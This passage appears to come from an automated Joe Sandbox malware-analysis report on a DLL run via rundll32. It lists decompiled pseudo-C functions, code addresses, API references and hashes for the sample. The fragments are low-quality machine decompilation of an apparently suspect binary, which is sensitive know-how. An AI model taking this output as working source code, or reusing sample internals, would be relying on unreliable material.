                  0x1800080b2
                  0x1800080bc
                  0x1800080c2
                  0x1800080cd
                  0x1800080d3
                  0x1800080d5
                  0x1800080da
                  0x1800080e2
                  0x1800080e2
                  0x1800080e7
                  0x1800080ef
                  0x1800080f7
                  0x1800080fe
                  0x18000810b
                  0x18000810f
                  0x180008116
                  0x180008121
                  0x180008124
                  0x180008127
                  0x18000814c

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterLeave$AllocHeapmemset
                  • String ID:
                  • API String ID: 3215818008-0
                  • Opcode ID: a5b05b0876b64fc44e85eded25e425ee8759b37968ca7e229990649024b80293
                  • Instruction ID: 1a3dd1e818266afc597f0a591a41220640f3dae03b5c6049ded73bf0a5c13329
                  • Opcode Fuzzy Hash: a5b05b0876b64fc44e85eded25e425ee8759b37968ca7e229990649024b80293
                  • Instruction Fuzzy Hash: F731A9B2A00B4896DB81CF5AE84878D77A0F748BD4F858026EF4D93360DF34CA9AC740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 39%
                  			E00000001180003698(void* __eflags, long long __rbx, void* __rcx, long long __rdx, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, short _a32) {
                  				void* _v32;
                  				short _v38;
                  				short _v40;
                  				long long _v48;
                  				signed short _v54;
                  				signed short _v56;
                  				void* __rsi;
                  				void* _t20;
                  				void* _t24;
                  				short _t30;
                  				signed short _t32;
                  				long long _t44;
                  				long _t56;
                  				long _t59;
                  				void* _t60;
                  				long long _t63;
                  				void* _t65;
                  				void* _t75;
                  				void* _t76;
                  
                  				_t45 = __rbx;
                  				_t75 = _t65;
                  				 *((long long*)(_t75 + 8)) = __rbx;
                  				 *((long long*)(_t75 + 0x10)) = __rbp;
                  				_t44 =  *0x8000d4a0;
                  				_t60 = __r8;
                  				_t63 = __rdx;
                  				_t20 = E00000001180001000(__rbx, _t75 - 0x20, __rdx, _t75 + 0x20);
                  				r12d = 0;
                  				if (_t20 != r12d) goto 0x8000376a;
                  				_t30 = _a32;
                  				_v38 = _t30;
                  				_v40 = _t30;
                  				_t32 = _t30 + 1 + _t30 + 1;
                  				_v54 = _t32;
                  				r8d = _t32 & 0x0000ffff;
                  				HeapAlloc(_t76, _t56, _t59);
                  				_v48 = _t44;
                  				if (_t44 == _t76) goto 0x8000375a;
                  				r8d = 0;
                  				_v56 = r12w;
                  				if (RtlOemStringToUnicodeString(??, ??, ??) - r12d >= 0) goto 0x80003731;
                  				RtlNtStatusToDosError(??);
                  				goto 0x80003748;
                  				_t24 = E00000001180005A0C((_v56 & 0x0000ffff) >> 1, _t45, _v48, _t60, _t63, _t63, _t60);
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				return _t24;
                  			}






















                  0x180003698
                  0x180003698
                  0x18000369b
                  0x18000369f
                  0x1800036ab
                  0x1800036b2
                  0x1800036b5
                  0x1800036c4
                  0x1800036c9
                  0x1800036d1
                  0x1800036d7
                  0x1800036dd
                  0x1800036e2
                  0x1800036ea
                  0x1800036ed
                  0x1800036f2
                  0x1800036f9
                  0x1800036ff
                  0x180003707
                  0x180003713
                  0x180003716
                  0x180003725
                  0x180003729
                  0x18000372f
                  0x180003743
                  0x180003754
                  0x180003764
                  0x18000377e

                  APIs
                    • Part of subcall function 0000000180001000: CreateFileW.KERNELBASE ref: 000000018000104A
                    • Part of subcall function 0000000180001000: GetFileSize.KERNEL32 ref: 000000018000105E
                    • Part of subcall function 0000000180001000: CloseHandle.KERNEL32 ref: 00000001800010D9
                    • Part of subcall function 0000000180001000: HeapFree.KERNEL32 ref: 00000001800010F0
                  • HeapAlloc.KERNEL32(?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 00000001800036F9
                  • RtlOemStringToUnicodeString.NTDLL ref: 000000018000371C
                  • RtlNtStatusToDosError.NTDLL ref: 0000000180003729
                  • HeapFree.KERNEL32(?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180003754
                  • HeapFree.KERNEL32(?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180003764
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$Free$FileString$AllocCloseCreateErrorHandleSizeStatusUnicode
                  • String ID:
                  • API String ID: 45859668-0
                  • Opcode ID: 9076e75a246ab2846ebd8e8eb0ec80191478d5bcc226e42bb9bdcc49be13810a
                  • Instruction ID: f5e01ebc0847fc45ed597bc040b189ed2f2401146e9d5498dfbecc36209ca11f
                  • Opcode Fuzzy Hash: 9076e75a246ab2846ebd8e8eb0ec80191478d5bcc226e42bb9bdcc49be13810a
                  • Instruction Fuzzy Hash: 6D217172218B5881E6A1DB26E44579E73A1FB8CBD4F549521FA8E83768DF38C649CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 60%
                  			E000000011800033B4(void* __eflags, long long __rbx, long long __rcx, long long __rdx, void* __r8, signed int __r9) {
                  				void* __rdi;
                  				intOrPtr _t65;
                  				intOrPtr _t87;
                  				intOrPtr _t100;
                  				intOrPtr _t101;
                  				intOrPtr _t105;
                  				signed long long _t107;
                  				void* _t112;
                  				void* _t120;
                  				signed long long _t123;
                  				signed long long _t130;
                  				intOrPtr* _t131;
                  				intOrPtr _t139;
                  				void* _t154;
                  				intOrPtr _t155;
                  				void* _t157;
                  				signed long long _t159;
                  				intOrPtr* _t160;
                  				void* _t163;
                  				void* _t165;
                  				void* _t166;
                  				intOrPtr* _t171;
                  				void* _t179;
                  				signed long long _t181;
                  				signed long long _t182;
                  				int _t185;
                  				int _t187;
                  				void* _t191;
                  
                  				 *((long long*)(_t165 + 0x18)) = __rbx;
                  				 *((long long*)(_t165 + 0x10)) = __rdx;
                  				 *((long long*)(_t165 + 8)) = __rcx;
                  				_t166 = _t165 - 0x660;
                  				_t155 =  *((intOrPtr*)(_t166 + 0x6c0));
                  				r13d = r9d;
                  				r9d =  *((intOrPtr*)(_t166 + 0x6c8));
                  				r9d = r9d - 1;
                  				_t123 = r9d - 1;
                  				if (__eflags < 0) goto 0x80003400;
                  				if ( *((intOrPtr*)(_t155 + _t123 * 4)) == 0) goto 0x800033f1;
                  				_t105 = __r9 + 1;
                  				 *((intOrPtr*)(_t166 + 0x28)) = _t105;
                  				if (_t105 == 0) goto 0x80003641;
                  				_t13 = _t123 + 0x20; // 0x20
                  				r14d = _t13;
                  				if ( *((intOrPtr*)(_t155 + _t123 * 4)) == 0) goto 0x8000342d;
                  				_t112 = 0 - r14d;
                  				if (_t112 >= 0) goto 0x8000342d;
                  				if (_t112 != 0) goto 0x80003422;
                  				r14d = r14d - 1;
                  				r8d = _t105;
                  				 *((intOrPtr*)(_t166 + 0x20)) = r14d;
                  				memset(_t191, _t187, _t185);
                  				_t16 = _t166 + 0x250; // 0x249
                  				r9d = r13d;
                  				r8d = r14d;
                  				_t130 = _t185 << 2;
                  				_t65 = E00000001180008AD0(_t112, _t130, _t16, __r8, _t155, _t179);
                  				_t17 = _t166 + 0x40; // 0x39
                  				r9d = _t105;
                  				 *((intOrPtr*)(_t166 + _t130 + 0x250)) = _t65;
                  				E00000001180008AD0(_t112, _t130, _t17, _t155, _t155, _t154);
                  				_t100 =  *((intOrPtr*)(_t166 + 0x40 + _t159 * 4));
                  				 *((intOrPtr*)(_t166 + 0x24)) = _t100;
                  				memset(_t163, ??);
                  				r13d = r13d - _t105;
                  				_t139 = _t105;
                  				_t181 = r13d;
                  				 *(_t166 + 0x30) = _t181;
                  				if (_t112 < 0) goto 0x800035ee;
                  				_t124 = _t181 + _t139;
                  				_t28 = _t181 * 4; // 0x249
                  				_t160 = _t166 + _t28 + 0x250;
                  				r9d = 0xffffffff;
                  				_t31 = _t124 * 4; // 0x249
                  				_t131 = _t166 + _t31 + 0x250;
                  				if (_t100 != r9d) goto 0x800034d0;
                  				_t101 =  *_t131;
                  				goto 0x800034fb;
                  				r8d = _t155 + 1;
                  				_t157 =  >  ? __r9 : (_t181 + _t139 << 0x20) + _t139 + _t181;
                  				_t44 = _t166 + 0x40; // 0x39
                  				_t171 = _t160;
                  				r10d = _t105;
                  				if (_t101 == 0) goto 0x8000357a;
                  				r12d = 0xffffffff;
                  				r9d =  *_t44;
                  				_t87 =  *_t160;
                  				r10d = r10d + r12d;
                  				_t176 = __r9 * _t163;
                  				 *_t171 = _t87;
                  				if (_t87 - r12d <= 0) goto 0x80003548;
                  				goto 0x8000354a;
                  				 *_t171 =  *_t171 - r9d;
                  				if ( *_t171 - r12d - r9d <= 0) goto 0x80003565;
                  				goto 0x80003567;
                  				if (r10d != 0) goto 0x80003517;
                  				_t107 =  *((intOrPtr*)(_t166 + 0x28));
                  				_t182 =  *(_t166 + 0x30);
                  				 *_t131 =  *_t131 - 0 + 0 + r11d;
                  				if ( *_t131 != 0) goto 0x80003595;
                  				_t47 = _t166 + 0x40; // 0x39
                  				r8d = _t107;
                  				_t120 = E000000011800049DC(_t160, _t47, _t171 + 4);
                  				if (_t120 < 0) goto 0x800035ae;
                  				_t48 = _t166 + 0x40; // 0x39
                  				r9d = _t107;
                  				 *_t131 =  *_t131 - E00000001180004D74(_t77,  *_t171, _t131, _t160, _t160, _t48);
                  				goto 0x8000357c;
                  				 *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x6a0)) + _t182 * 4)) = _t101 + 1;
                  				r13d = r13d - 1;
                  				 *(_t166 + 0x30) = _t182 - 1;
                  				r9d = 0xffffffff;
                  				if (_t120 >= 0) goto 0x800034c7;
                  				r14d =  *((intOrPtr*)(_t166 + 0x20));
                  				r8d =  *((intOrPtr*)(_t166 + 0x6c8));
                  				memset(??, ??, ??);
                  				_t57 = _t166 + 0x250; // 0x249
                  				r9d = _t107;
                  				r8d = r14d;
                  				E00000001180007220(_t120, _t131 - 4,  *((intOrPtr*)(_t166 + 0x6a8)), _t57, _t157, _t176, _t159);
                  				r8d = 0x40c;
                  				memset(??, ??, ??);
                  				r8d = 0x204;
                  				return memset(??, ??, ??);
                  			}































                  0x1800033b4
                  0x1800033b9
                  0x1800033be
                  0x1800033ce
                  0x1800033d5
                  0x1800033dd
                  0x1800033e0
                  0x1800033f1
                  0x1800033f4
                  0x1800033f8
                  0x1800033fe
                  0x180003400
                  0x180003404
                  0x18000340a
                  0x18000341a
                  0x18000341a
                  0x180003420
                  0x180003422
                  0x180003425
                  0x18000342b
                  0x18000342d
                  0x180003430
                  0x180003441
                  0x180003446
                  0x18000344b
                  0x180003456
                  0x180003459
                  0x18000345f
                  0x180003463
                  0x180003468
                  0x18000346d
                  0x180003473
                  0x18000347a
                  0x18000347f
                  0x180003490
                  0x180003494
                  0x180003499
                  0x18000349c
                  0x18000349f
                  0x1800034a2
                  0x1800034a7
                  0x1800034ad
                  0x1800034b1
                  0x1800034b1
                  0x1800034b9
                  0x1800034bf
                  0x1800034bf
                  0x1800034ca
                  0x1800034cc
                  0x1800034ce
                  0x1800034d3
                  0x1800034f7
                  0x1800034fd
                  0x180003505
                  0x180003508
                  0x18000350d
                  0x180003511
                  0x18000351a
                  0x180003520
                  0x180003524
                  0x180003527
                  0x18000353a
                  0x18000353f
                  0x180003546
                  0x18000354a
                  0x18000355c
                  0x180003563
                  0x18000356f
                  0x180003571
                  0x180003575
                  0x18000357a
                  0x18000357f
                  0x180003581
                  0x180003586
                  0x180003591
                  0x180003593
                  0x180003595
                  0x18000359a
                  0x1800035aa
                  0x1800035ac
                  0x1800035be
                  0x1800035c9
                  0x1800035cd
                  0x1800035d5
                  0x1800035db
                  0x1800035e1
                  0x1800035ee
                  0x1800035ff
                  0x180003604
                  0x18000360c
                  0x18000360f
                  0x180003615
                  0x180003624
                  0x18000362a
                  0x180003636
                  0x18000365b

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: memset
                  • String ID:
                  • API String ID: 2221118986-0
                  • Opcode ID: a76d0726cef9ae4b561de819fedaba575e74fa77d35c7135b84bcd3433ab4b61
                  • Instruction ID: ec3f035d16c0e924505bfe3f3cda61bac28d8e6f0fc5c54ff73492b97cc3beba
                  • Opcode Fuzzy Hash: a76d0726cef9ae4b561de819fedaba575e74fa77d35c7135b84bcd3433ab4b61
                  • Instruction Fuzzy Hash: EE61F532704A8486E772CE27E8457DABB95F3D8BC8F448125EE4953B98DF39E605CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: memcmp$FreeHeap
                  • String ID:
                  • API String ID: 1680564963-0
                  • Opcode ID: ebefc488027962227a33868cb32fed72d0b4f2502500ec4154850c2412e11902
                  • Instruction ID: e13f11c4693d54ee7f56904197b6c81cc0d09359d032e1af4ae6464abc78b12e
                  • Opcode Fuzzy Hash: ebefc488027962227a33868cb32fed72d0b4f2502500ec4154850c2412e11902
                  • Instruction Fuzzy Hash: 4551A172B0878955EBA2CB15A4843DA77A1A7AD7C4F54C025EE8C43786EE3DC64DC701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 37%
                  			E00000001180001EEC(void* __edi, void* __eflags, long long __rbx, long long __rcx, void* __rdx, void* __r8) {
                  				void* __rsi;
                  				signed int _t65;
                  				unsigned int _t66;
                  				signed int _t73;
                  				void* _t78;
                  				unsigned int _t85;
                  				void* _t87;
                  				void* _t91;
                  				void* _t112;
                  				int _t116;
                  				long long _t122;
                  				void* _t125;
                  				void* _t126;
                  				int _t143;
                  				void* _t145;
                  				void* _t148;
                  
                  				_t78 = __eflags;
                  				_t87 = _t125;
                  				 *((long long*)(_t87 + 0x10)) = __rbx;
                  				 *((long long*)(_t87 + 0x18)) = _t122;
                  				 *((long long*)(_t87 + 8)) = __rcx;
                  				_t126 = _t125 - 0x860;
                  				r14d =  *((intOrPtr*)(_t126 + 0x8b8));
                  				_t91 = __rdx;
                  				 *(_t126 + 0x30) = _t148 << 2;
                  				memcpy(_t148, _t145, _t143);
                  				_t9 = _t126 + 0x454; // 0x4a5
                  				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
                  				E00000001180003934(__rdx, _t9, _t148 << 2,  *((intOrPtr*)(_t126 + 0x8b0)));
                  				_t13 = _t126 + 0x658; // 0x6a9
                  				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
                  				E00000001180003934(_t91, _t13, _t148 << 2,  *((intOrPtr*)(_t126 + 0x8b0)));
                  				memset(_t112, _t116);
                  				 *((intOrPtr*)(_t126 + 0x40)) = 1;
                  				_t73 = __edi - 1;
                  				if (_t78 < 0) goto 0x80001faa;
                  				if ( *((intOrPtr*)(__r8 + (r9d - 1) * 4)) == 0) goto 0x80001f9a;
                  				r12d = _t73;
                  				if (_t73 < 0) goto 0x80002081;
                  				_t65 =  *(__r8 + _t73 * 4);
                  				if (_t73 != r12d) goto 0x80001fe8;
                  				if ((_t65 & 0xc0000000) != 0) goto 0x80001fe8;
                  				_t66 = _t65 << 2;
                  				if ((_t66 & 0xc0000000) == 0) goto 0x80001fd2;
                  				if (0x10000001e == 0) goto 0x80002075;
                  				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
                  				E00000001180003934(_t91, _t126 + 0x40, _t73,  *((intOrPtr*)(_t126 + 0x8b0)));
                  				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
                  				E00000001180003934(_t91, _t126 + 0x40, _t73,  *((intOrPtr*)(_t126 + 0x8b0)));
                  				_t85 = _t66 >> 0x1e;
                  				if (_t85 == 0) goto 0x80002068;
                  				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
                  				E00000001180003934(_t91, _t126 + 0x40, _t73,  *((intOrPtr*)(_t126 + 0x8b0)));
                  				if (_t85 != 0) goto 0x80001fef;
                  				if (_t85 >= 0) goto 0x80001fbb;
                  				memcpy(??, ??, ??);
                  				r8d = 0x60c;
                  				memset(??, ??, ??);
                  				r8d = 0x204;
                  				return memset(??, ??, ??);
                  			}



















                  0x180001eec
                  0x180001eec
                  0x180001eef
                  0x180001ef3
                  0x180001ef7
                  0x180001f03
                  0x180001f0a
                  0x180001f22
                  0x180001f2c
                  0x180001f31
                  0x180001f46
                  0x180001f51
                  0x180001f56
                  0x180001f6b
                  0x180001f76
                  0x180001f7b
                  0x180001f8a
                  0x180001f8f
                  0x180001f9a
                  0x180001fa0
                  0x180001fa8
                  0x180001faa
                  0x180001fb5
                  0x180001fbb
                  0x180001fc8
                  0x180001fd0
                  0x180001fd2
                  0x180001fde
                  0x180001fe2
                  0x180002006
                  0x18000200b
                  0x180002027
                  0x18000202c
                  0x180002036
                  0x180002038
                  0x18000205e
                  0x180002063
                  0x18000206f
                  0x18000207b
                  0x180002093
                  0x1800020a2
                  0x1800020a8
                  0x1800020b4
                  0x1800020da

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: memset$memcpy
                  • String ID:
                  • API String ID: 368790112-0
                  • Opcode ID: 9069574d71fd3576152aa11697abaa86dc79558948906a610bfcadaab4521cb1
                  • Instruction ID: c336bcc7fd0d3219ccdcc3e7649660a569ab46c29ccafd654ab2136e7df858a2
                  • Opcode Fuzzy Hash: 9069574d71fd3576152aa11697abaa86dc79558948906a610bfcadaab4521cb1
                  • Instruction Fuzzy Hash: ED416272204BCA95EB61DA12E4443EAB364F7D9BC4F418111FF8857B89DF39C60ACB40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 34%
                  			E00000001180006108(signed int __rbx, long long __rcx, void* __rdx, void* __r8, char _a8, long long _a16, intOrPtr _a24, intOrPtr _a48, intOrPtr _a56, long long _a64) {
                  				long long _v72;
                  				long long _v88;
                  				void* __rsi;
                  				void* __rbp;
                  				intOrPtr _t40;
                  				void* _t56;
                  				void* _t57;
                  				intOrPtr _t67;
                  				intOrPtr _t69;
                  				intOrPtr* _t73;
                  				signed long long _t90;
                  				void* _t92;
                  				void* _t108;
                  				void* _t110;
                  				intOrPtr* _t112;
                  
                  				_t72 = __rbx;
                  				_a16 = __rbx;
                  				_a8 = __rcx;
                  				_t69 =  *0x8000d4a0;
                  				_t57 = r8d;
                  				_v72 =  *((intOrPtr*)(_t69 + 8));
                  				_t8 = _t90 + 8; // 0x8
                  				r14d = _t8;
                  				HeapAlloc(??, ??, ??);
                  				if (_t69 == 0) goto 0x8000627d;
                  				if (_t57 == 0) goto 0x800061f7;
                  				_t112 = __rdx + 0x20;
                  				E00000001180006008(__rbx, __rcx, _t92, __rdx + (__rbx + __rbx * 4) * 8);
                  				if (_t69 == 0) goto 0x800061ec;
                  				r9d =  *((intOrPtr*)(_t112 - 8));
                  				_v88 = _t69 + (_t90 + _t90 * 2) * 8;
                  				_a24 = E00000001180006344(_t69, _t72, _a8, _t69, _t92,  *_t112, _t108, _t110);
                  				HeapFree(??, ??, ??);
                  				_t40 = _a24;
                  				if (_t40 == 0) goto 0x800061ec;
                  				_t56 = 0 + _t40;
                  				if (1 - _t57 < 0) goto 0x80006176;
                  				r14d = 8;
                  				if (1 != _t57) goto 0x80006225;
                  				_v88 = _a64;
                  				r14d = E00000001180007444(_t40, _t56, _t72, _t69, _a48, _a56);
                  				if (_t56 == 0) goto 0x8000626f;
                  				_t31 =  &_a8; // 0x8
                  				_t73 = _t31;
                  				if ( *_t73 == 0) goto 0x8000624b;
                  				HeapFree(??, ??, ??);
                  				if ( *((intOrPtr*)(_t73 - 8)) == 0) goto 0x80006265;
                  				_t67 =  *((intOrPtr*)(_t73 + 0xc));
                  				if (_t67 == 0) goto 0x80006265;
                  				HeapFree(??, ??, ??);
                  				if (_t67 != 0) goto 0x80006238;
                  				HeapFree(??, ??, ??);
                  				return r14d;
                  			}


















                  0x180006108
                  0x180006108
                  0x18000610d
                  0x180006121
                  0x180006128
                  0x180006148
                  0x18000614d
                  0x18000614d
                  0x180006151
                  0x18000615d
                  0x180006167
                  0x180006172
                  0x180006184
                  0x18000618f
                  0x180006191
                  0x1800061ae
                  0x1800061c0
                  0x1800061c7
                  0x1800061cd
                  0x1800061d6
                  0x1800061e2
                  0x1800061ea
                  0x1800061f1
                  0x1800061f9
                  0x180006218
                  0x180006222
                  0x180006232
                  0x180006234
                  0x180006234
                  0x18000623e
                  0x180006245
                  0x180006252
                  0x180006254
                  0x180006258
                  0x18000625f
                  0x18000626d
                  0x180006277
                  0x180006297

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$Freelstrlen$Alloc$Timelstrcatlstrcpy$AllocateFileSleepSystem_snprintf
                  • String ID:
                  • API String ID: 3514998008-0
                  • Opcode ID: 32a0b26bd92ab6956d2394037830c20eeece6c9e21b54aa9face044d742a5a88
                  • Instruction ID: d6b07597f5ec485a57081f9d46160005d1067fb2ae4cc7d855a507384812b52f
                  • Opcode Fuzzy Hash: 32a0b26bd92ab6956d2394037830c20eeece6c9e21b54aa9face044d742a5a88
                  • Instruction Fuzzy Hash: E1415E32604B8892EBA2CF56E8447DA77A1F788BC4F48C016EE5D93765DF38C649C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 60%
                  			E00000001180007DBC(void* __edx, void* __eflags, void* __rcx, long long __rdx, long long __r8, signed int _a8, long long* _a16, signed int* _a24, signed int _a32) {
                  				intOrPtr _v80;
                  				void* _v88;
                  				long _v96;
                  				signed int _v104;
                  				long long _v112;
                  				long long _v120;
                  				void* __rbx;
                  				void* __rsi;
                  				void* __rbp;
                  				signed int _t55;
                  				signed int _t63;
                  				void* _t64;
                  				void* _t71;
                  				void* _t73;
                  				signed int _t74;
                  				void* _t75;
                  				void* _t76;
                  				void* _t85;
                  				signed long long _t107;
                  				struct _FILETIME* _t110;
                  				void* _t128;
                  				void* _t129;
                  				long _t131;
                  				signed int _t132;
                  				void* _t135;
                  				void* _t137;
                  				void* _t147;
                  				void* _t148;
                  				void* _t149;
                  				signed int* _t150;
                  				long long _t151;
                  				void* _t153;
                  				signed long long _t155;
                  				void* _t157;
                  
                  				_t148 = _t137;
                  				 *((long long*)(_t148 + 0x18)) = __r8;
                  				 *((long long*)(_t148 + 0x10)) = __rdx;
                  				 *(_t148 + 0x20) =  *(_t148 + 0x20) & 0x00000000;
                  				r14d = 0;
                  				_v104 =  *0x8000d498;
                  				_t129 = __rcx;
                  				 *(_t148 - 0x58) =  *(_t148 - 0x58) & _t155;
                  				if (E00000001180001CB0(_t110, __rcx, _t148 - 0x60, _t135, _t148 + 8, _t157, _t155) == 0) goto 0x80007e19;
                  				_t11 = _t155 + 1; // 0x1
                  				r12d = _t11;
                  				_v96 = _t131;
                  				goto 0x80007e24;
                  				_t132 = _v96;
                  				r12d = 2;
                  				_t14 =  &_a32; // 0xba
                  				_t15 =  &_v88; // 0x42
                  				if (E00000001180008034(_t71, r12d, _t85, _t110, _t129, _t132, _t135, _t15, _t14, _t153, _t149) != 0) goto 0x80007fff;
                  				r8d = _a32;
                  				r13d = r8d;
                  				r13d = r13d - r12d;
                  				_t150 = _v88;
                  				if (_t132 == 0) goto 0x80007e7d;
                  				_t55 = _a8;
                  				_t150[0xa] = 1;
                  				_t150[0x12] = _t132;
                  				_t150[0xd] = _t55;
                  				_t150[0x10] = _t55;
                  				_t24 = _t129 + 0xb0; // 0xb0
                  				r9d = 0;
                  				 *_t150 = _v104 ^ 0x62ade362;
                  				_t150[3] =  *(_t129 + 0x48);
                  				_t150[2] =  *(_t129 + 0x4c);
                  				_t29 =  &_a8; // 0xa2
                  				_v112 = _t29;
                  				_t31 =  &_v104; // 0x32
                  				_v120 = _t31;
                  				_t73 = E0000000118000970C(_t54, _t110, _t24, _t150, _t132, _t15, _t14, _t148);
                  				HeapFree(_t128, _t131, _t135);
                  				if (r13d == 0) goto 0x80007eef;
                  				if (_t73 == 0) goto 0x80007ee4;
                  				if (_t73 != 0x10d2) goto 0x80007eef;
                  				E000000011800023B8(r13d, _t110, _t129, _t132, _t135);
                  				if (_t73 != 0) goto 0x80007fff;
                  				_t74 = _a8;
                  				_t151 = _v104;
                  				r13d =  *(_t129 + 0x4c);
                  				_t63 = E00000001180008C48(_t74, _t151);
                  				_t36 =  &_a8; // 0xa2
                  				r9d = 1;
                  				 *(_t129 + 0x48) = _t74;
                  				 *(_t129 + 0x4c) = _t63;
                  				_t64 = E000000011800099F4(_t76, _t110, _t129, _t151, _t132, _t135, _t36, _t147, _t148);
                  				_t75 = _t64;
                  				if (_t64 != 0) goto 0x80007fef;
                  				 *_a16 = _t151;
                  				 *_a24 = _a8;
                  				if ( *(_t129 + 0x4c) != r13d) goto 0x80007f62;
                  				r14d = 1;
                  				if ( *((intOrPtr*)(_t129 + 0x60)) == 0) goto 0x80007fb5;
                  				GetSystemTimeAsFileTime(_t110);
                  				if (r14d == 0) goto 0x80007fa2;
                  				_t107 =  *((intOrPtr*)(_t129 + 0x58));
                  				if (_v80 - _t107 <= 0) goto 0x80007fa2;
                  				_t47 = _t129 + 0xb0; // 0xb0
                  				if (E000000011800045E8(_t75, _t107, _t110, _t47, _t132, _t135) != 0) goto 0x80007fa2;
                  				asm("lock or dword [edi+0xdc], 0x1");
                  				 *((long long*)(_t129 + 0x58)) = _t107 * 0x23c34600 + _v80;
                  				if (_v96 == 0) goto 0x80007fdc;
                  				HeapFree(??, ??, ??);
                  				if (_t75 == 0) goto 0x80007fd4;
                  				if (_t75 != 0x10d2) goto 0x80007fdc;
                  				E00000001180008BC4(_t110, _t129, _v96);
                  				return _t75;
                  			}





































                  0x180007dbc
                  0x180007dbf
                  0x180007dc3
                  0x180007dde
                  0x180007df5
                  0x180007df8
                  0x180007dfc
                  0x180007dff
                  0x180007e0a
                  0x180007e0e
                  0x180007e0e
                  0x180007e12
                  0x180007e17
                  0x180007e19
                  0x180007e1e
                  0x180007e24
                  0x180007e2c
                  0x180007e40
                  0x180007e46
                  0x180007e4e
                  0x180007e51
                  0x180007e54
                  0x180007e5c
                  0x180007e5e
                  0x180007e65
                  0x180007e6e
                  0x180007e73
                  0x180007e78
                  0x180007e81
                  0x180007e88
                  0x180007e93
                  0x180007e9a
                  0x180007ea2
                  0x180007ea7
                  0x180007eaf
                  0x180007eb4
                  0x180007eb9
                  0x180007ecb
                  0x180007ecd
                  0x180007ed6
                  0x180007eda
                  0x180007ee2
                  0x180007eea
                  0x180007ef1
                  0x180007ef7
                  0x180007efe
                  0x180007f03
                  0x180007f0c
                  0x180007f11
                  0x180007f19
                  0x180007f25
                  0x180007f28
                  0x180007f2b
                  0x180007f30
                  0x180007f34
                  0x180007f4a
                  0x180007f54
                  0x180007f5a
                  0x180007f5c
                  0x180007f66
                  0x180007f6d
                  0x180007f76
                  0x180007f78
                  0x180007f81
